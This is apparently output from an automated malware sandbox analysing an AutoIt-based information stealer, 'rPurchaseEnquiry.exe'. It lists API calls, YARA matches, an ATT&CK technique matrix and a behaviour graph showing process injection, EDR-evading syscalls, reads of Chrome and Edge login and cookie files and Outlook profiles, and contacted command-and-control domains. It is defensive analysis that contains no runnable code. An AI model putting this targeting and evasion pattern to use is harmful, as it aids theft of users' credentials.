                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BE7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00BE7CAF
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BE874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00BE874B
                Source: rPurchaseEnquiry.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: rPurchaseEnquiry.exe, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000000.1230943714.0000000001491000.00000002.00000001.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647476489.0000000001491000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000000.1230943714.0000000001491000.00000002.00000001.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647476489.0000000001491000.00000002.00000001.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377180440.0000000000D81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000000.1230943714.0000000001491000.00000002.00000001.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647476489.0000000001491000.00000002.00000001.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377180440.0000000000D81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
                Source: rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000000.1230943714.0000000001491000.00000002.00000001.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 00000004.00000002.3647476489.0000000001491000.00000002.00000001.00040000.00000000.sdmp, rdDg0b2bK2qO9Yy1bQgDRyk.exe, 0000000C.00000000.1377180440.0000000000D81000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BB862B cpuid 0_2_00BB862B
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00BC4E87
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BD1E06 GetUserNameW,0_2_00BD1E06
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00BC3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00BC3F3A
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00B949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B949A0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3648063161.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3646181884.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308769709.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308257094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3648116990.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3648050899.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1309204270.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: rPurchaseEnquiry.exeBinary or memory string: WIN_81
                Source: rPurchaseEnquiry.exeBinary or memory string: WIN_XP
                Source: rPurchaseEnquiry.exeBinary or memory string: WIN_XPe
                Source: rPurchaseEnquiry.exeBinary or memory string: WIN_VISTA
                Source: rPurchaseEnquiry.exeBinary or memory string: WIN_7
                Source: rPurchaseEnquiry.exeBinary or memory string: WIN_8
                Source: rPurchaseEnquiry.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3648063161.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3646181884.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308769709.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1308257094.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3648116990.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3648050899.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1309204270.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C06283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00C06283
                Source: C:\Users\user\Desktop\rPurchaseEnquiry.exeCode function: 0_2_00C06747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C06747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets151
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1640955 Sample: rPurchaseEnquiry.exe Startdate: 17/03/2025 Architecture: WINDOWS Score: 100 28 www.malekenterprise.xyz 2->28 30 www.345bet.xyz 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 5 other signatures 2->50 10 rPurchaseEnquiry.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 rdDg0b2bK2qO9Yy1bQgDRyk.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 rdDg0b2bK2qO9Yy1bQgDRyk.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 malekenterprise.xyz 63.250.38.223, 49719, 49720, 49721 NAMECHEAP-NETUS United States 22->34 36 www.vibew.live 69.57.163.64, 49695, 49697, 49699 FORTRESSITXUS United States 22->36 38 8 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.